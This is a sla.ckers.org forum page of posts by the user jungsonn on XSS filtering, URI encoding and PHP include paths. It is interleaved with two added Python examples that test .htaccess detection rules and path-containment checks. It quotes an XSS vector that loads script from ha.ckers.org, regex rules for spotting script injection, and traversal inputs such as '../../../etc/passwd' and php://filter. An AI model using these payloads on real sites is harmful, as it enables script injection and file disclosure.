Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as they relate to computer security.

Current Page: 1 of 36
Results 1 - 30 of 1069
7 years ago
jungsonn
@RSnake, yeah that might be right. I'm in no position to even think about these browser issues; it's not my job and certainly far from any personal expertise, and I quickly made some false assumptions about it. It's really harder than I thought it would be. But I can't help getting the impression that the browser vendors can solve such issues, I'm only not sure how.
Forum: Projects
7 years ago
jungsonn
Ooops.. I need some sleep, forgive me. I meant the &lt; conversion of <, not the %3C. But actually, it brought me to the same issue more or less. Yeah, that's a tough one; I thought about it for some time, but that would require some content negotiation. But can it be done like: if %3C is input inside a URI, always convert it back to &lt; on the screen? Like htmlentities does, or htmls
Forum: Projects
7 years ago
jungsonn
But trev, if it's encoded, you can store it encoded in the database, and you still can post HTML, because the forum shows the non-printable chars you've sent: %3C. So if you post HTML it's being encoded; well, that's the whole point, isn't it? Why should it be decoded back to printable chars server-side if it's in a posted array? Because almost every GLOBAL var you need to encode anyway.
Forum: Projects
7 years ago
jungsonn
Yeah, I'm moving on thin ice here ^^. I meant "less/greater sign", though it sounds so awkward, and I always call them brackets. But let's view it a little differently; I thought about this: the less/greater signs < > which are sent through the browser are encoded, and when it echoes into a vulnerable script it is decoded (not 100% correct, but forgive me on that). So in the URI a:
Forum: Projects
7 years ago
jungsonn
It could be a great option in browsers. @Kyran, yes that would be a nice way. I understand that it will throw up certain limits, but what I am trying to understand is: do sites use special chars like brackets in URIs? Maybe what Kyran said is a nice status quo: if brackets are detected the browser could throw an alert screen: possible attack etc... blabla bla.. continue or shut this
Forum: Projects
7 years ago
jungsonn
Yeah, I'm leaning more toward the browser developers these days because really... who needs such things in their URI? Isn't it the case that browser vendors have the power to change all these issues? I've never seen a URI with brackets in it like: index.php?page=>blaaah< blaaaah. Could we do without these chars in the URI?
Forum: Projects
7 years ago
jungsonn
It's amazing a browser will render this... that should be forbidden. ^_^
Forum: Projects
7 years ago
jungsonn
Wowie... didn't know that, is this on the cheat sheet also? Any other suggestions I must keep an eye on? Maybe filtering for .js in this case. But I thought to use it as a small protection, or small IDS, because most people will try the first few, then -if they are clever enough- will resort to the complex ones you gave. Not 100% yet, but I'm getting there :)
Forum: Projects
7 years ago
jungsonn
<script/src=//ha.ckers.org/xss.js
@RSnake Wow.... that thing really works? :-||
Forum: Projects
7 years ago
jungsonn
True RSnake, but only a handful of people know this. You're one of them. But that's a really small fix. The only difference is: %22 or a space.
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E|%22)
Forum: Projects
7 years ago
jungsonn
I've done a similar thing for the request URIs in a .htaccess, maybe you haven't seen it:
.htaccess
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).*
RewriteRule ^(.*)$ log.php
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E)
RewriteRule ^(.*)$ log.php
RewriteCond %{QUERY_STRING} (javascript:).*(\;).*
RewriteRule
Forum: Projects
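The three RewriteCond patterns in this .htaccess post, plus the amended script pattern from the later post above (`(\<|%3C).*script.*(\>|%3E|%22)`), re-implemented in Python as an added example so they can be run offline against sample query strings. This is not code from the original post or from sla.ckers.org. mod_rewrite evaluates each RewriteCond as an unanchored, case-sensitive PCRE search over the raw, still percent-encoded QUERY_STRING (the [NC] flag makes it case-insensitive), which `re.search` models closely enough for this purpose. The sample query strings are constructed for the example; the `<script/src=//ha.ckers.org/xss.js` vector is the one quoted in the post further up.

```python
"""Offline re-implementation of the mod_rewrite conditions from the .htaccess
post above.  Added example, not code from the original post."""
import re

# The three conditions from the .htaccess post, plus the amended second one
# (with %22 added) from the follow-up post.  Regex text copied verbatim.
PATTERNS = {
    "quote-then-angle": r'(\"|%22).*(\>|%3E|<|%3C).*',
    "script-tag":       r'(\<|%3C).*script.*(\>|%3E)',
    "script-tag-v2":    r'(\<|%3C).*script.*(\>|%3E|%22)',
    "javascript-uri":   r'(javascript:).*(\;).*',
}


def matching_rules(query_string, nocase=False):
    """Return the names of the rules that would fire for a raw query string.

    RewriteCond matches are unanchored searches, so re.search() is used.
    nocase=True models adding the [NC] flag to every RewriteCond.
    """
    flags = re.IGNORECASE if nocase else 0
    return [name for name, pat in PATTERNS.items()
            if re.search(pat, query_string, flags)]


# Constructed sample query strings (not from the original thread).
SAMPLES = [
    "q=%3Cscript%3Ealert(1)%3C/script%3E",        # textbook vector: caught
    "q=<script/src=//ha.ckers.org/xss.js",        # no closing '>' or '"': missed by every rule
    "q=%22%3E<script/src=//ha.ckers.org/xss.js",  # attribute break-out: only the quote rule fires
    "q=%3CSCRIPT%3Ealert(1)%3C/SCRIPT%3E",        # upper case: missed without [NC]
    "q=%253Cscript%253E",                         # double-encoded: raw string never contains %3C
    "u=javascript:alert(1)",                      # no ';', so the javascript: rule never fires
    "u=javascript:alert(1);",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(f"{qs!r:50} -> {matching_rules(qs) or 'no match'}")
    print("with [NC]:", matching_rules(SAMPLES[3], nocase=True))
```

Running the block shows where the rules stop: the `<script/src=` vector matches nothing, because both script patterns insist on a closing `>`/`%3E` (or `%22` in the amended one) somewhere after `script`; the upper-case variant is missed unless every condition carries `[NC]`; the double-encoded `%253C` never contains the substring `%3C`, so a rule that inspects the raw query string cannot see what the application will see after it decodes; and `javascript:` without a trailing `;` slips past the third rule.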
7 years ago
jungsonn
Sorry, but I can insert "javascript" also without the added nulls, so that's useless. And even when it goes through a sanitizing script you still can't do a thing, because you still need chars like < > ' " to do some real harm. The < gets converted, like it should. I cannot make it spit out < again. If someone can do this, I'd really like to hear it, because about a few m
Forum: XSS Info
7 years ago
jungsonn
Yeh and they probably call it a Gookie instead of cookie.
Forum: SQL and Code Injection
7 years ago
jungsonn

Forum: OMG Ponies
7 years ago
jungsonn
Haha, wow, I never thought MySpace would use base64. That's a classic security-through-wrong-obscurity example. I thought they would be smarter and generate random tokens. They say MySpace cannot detect it, but that is a false statement; of course they can detect it by decoding it back, which they probably already do to fetch content based upon the parameters in it. - I'm not sure because I ne
Forum: CSRF and Session Info
7 years ago
jungsonn
Yeah, exactly kuza55. I was auditing the Firefox code for about 3 months in 2006 and it's hard to find new entry points. There were some serious flaws which resulted in local file execution, but that was quickly fixed.
Forum: CSRF and Session Info
7 years ago
jungsonn
Well, you can't insert the less and greater sign if you insert it as "demo input"; they just convert to their entities (as expected). So I can't think of a way to abuse this. The example only shows a hardcoded XSS vector, so I don't get the point.
Forum: XSS Info
7 years ago
jungsonn
Haha, you always get the funniest ones! I wonder, you must talk about it somewhere on your site then? ^^ Or at least use a few words?
Forum: OMG Ponies
7 years ago
jungsonn
Quote: miroslav.stampar(at)google.com
You work at Google? ^^
Forum: SQL and Code Injection
7 years ago
jungsonn
Botmaster uses proxies, and in fact I found the proxy list which botmaster utilizes. I came across it through some good searching and Google dorking, but I didn't save the proxy list. Anyhow, it was pretty huge. Still, I think when one can juggle the contents of your source it's pretty hard for them to regex on. Like using multiple hidden random signup forms, and rotating them around in the source.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jungsonn
Oh sure it is, and really was. It's a great discussion and tons of fun to wrap my mind around; learned a good piece here. I was just ranting some stuff I had in my mind, trying to put things into context again and to see the actual risk, which included the use of JavaScript to attack it -which obviously works- but is tough to deploy on a large *automated* scale. So that got me thinking. And
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jungsonn
I think they don't know. It's a big world out there with millions of users. Sure, they can track them if they wanted, but my fair guess is that we are just a statistic, a number in some big-ass charts they have. On the point of correlating people to data, really, it's amazing how little this is being done. Or people aren't just that smart to do it efficiently; I think this is really overestimate
Forum: Search Engine Hacking and SEO
7 years ago
jungsonn
how+come+when+i+tryed+to+log+in+my+myspace+it+says+my+myspace+user+is+blocked+and+won%27t+be+able+to+go+in
Forum: OMG Ponies
7 years ago
jungsonn
I think you can't; it translates to a different address on that server. Files are not shared on a subdomain. Maybe you can try to call the full server path, just a thought.
Forum: OMG Ponies
7 years ago
jungsonn
Eh.. I still can't figure out how one can exploit it, care to explain it? Because what happens in your example is zero.
Forum: XSS Info
7 years ago
jungsonn
Why not just: SLA.CKERS.ORG without all the textual crap, like a small logo in the left corner. It's stylish and not so bourgeois.
Forum: OMG Ponies
7 years ago
jungsonn
Most of the time it's quicker to do a Google lookup like: "CMS exploit", which usually gives you tons of info and saves you a lot of time. Because most of the time when I look for bugs I have to install the damn thing, and that eats away precious time. :)
Forum: SQL and Code Injection
7 years ago
jungsonn
It's an interesting ambiance I regularly get around security people. Don't get me wrong, but many people think that if something is broken it isn't secure. Like some scripters think -and email me- when they've bypassed some scripts I wrote, and say: hey, it's broken! And I reply: I knew that; if you had asked me first I could have given you the holes, it would have saved you tons of free time. :) Well cle
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jungsonn
That MySpace is so popular... I really don't get it. I have no account there and I'm not interested in it either. What's the whole point, and what's up with hijacking another's account? What do you get when you jack an account there?
Forum: Intro
7 years ago
jungsonn
Did they also hardcode the paths? Like:
include("server/var/file.php");
Or did they do this, which is somewhat semi-hardcoded also:
$root = "server/var/";
include($root."file.php");
Or:
include($_SERVER['PHP_SELF']."file.php");
since these are vulnerable too. And do they use unset() anywhere?
Forum: SQL and Code Injection
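The post above contrasts a fully hard-coded include with paths assembled from a variable or from `$_SERVER['PHP_SELF']`. As an added example (not code from the original post or from the CMS being discussed), here is the containment check that any include of a request-influenced page name needs before the file is loaded, written in Python so it runs offline; the same logic applies to a PHP include(). The base directory `/srv/app/inc`, the `PAGE_MAP` entries and the sample names are constructed for the example, not paths from the thread.

```python
"""Containment check for a request-influenced include path.
Added example, not code from the original post; Python stands in for PHP."""
import os


class UnsafeIncludePath(ValueError):
    """Raised when a requested include name must not be loaded."""


# Fully hard-coded variant: the request can only pick a key, never spell a
# path.  The page names and files here are constructed for the example.
PAGE_MAP = {
    "home": "home.php",
    "about": "about.php",
}


def page_from_map(name):
    """Allowlist lookup: return the file for a known page or raise."""
    try:
        return PAGE_MAP[name]
    except KeyError:
        raise UnsafeIncludePath("unknown page %r" % name) from None


def safe_include_path(base_dir, requested, ext=".php"):
    """Resolve `requested` under `base_dir` and refuse anything that escapes.

    Rejected before touching the filesystem: empty names, NUL bytes (the old
    PHP null-byte truncation trick), absolute paths and anything carrying a
    scheme such as php:// or http://.  '..' traversal is caught afterwards by
    comparing the resolved candidate against the resolved base directory.
    """
    if not requested:
        raise UnsafeIncludePath("empty include name")
    if "\x00" in requested:
        raise UnsafeIncludePath("NUL byte in include name")
    if (os.path.isabs(requested) or "://" in requested
            or requested.startswith(("/", "\\"))):
        raise UnsafeIncludePath("absolute path or URL: %r" % requested)

    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested + ext))
    # commonpath() is the right containment test; a plain startswith() would
    # accept /srv/app/inc-evil/x.php as being inside /srv/app/inc.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeIncludePath("%r resolves outside %s" % (requested, base))
    return candidate


def is_safe_include(base_dir, requested):
    """Boolean wrapper around safe_include_path() for quick checks."""
    try:
        safe_include_path(base_dir, requested)
        return True
    except UnsafeIncludePath:
        return False


if __name__ == "__main__":
    # Constructed inputs: the first two are legitimate, the rest are attacks.
    for name in ["file", "sub/../file", "../../../etc/passwd", "/etc/passwd",
                 "php://filter/resource=index", "file\x00", ""]:
        verdict = "ok" if is_safe_include("/srv/app/inc", name) else "REJECTED"
        print("%-35r -> %s" % (name, verdict))
```

The fixed extension is appended after the check so a request can never pick a non-.php file, and the NUL check is kept explicit rather than relying on the runtime to reject it. Where the set of includable pages is known up front, `page_from_map()` is the simpler and safer option: the request selects a key, and no path is ever built from its contents.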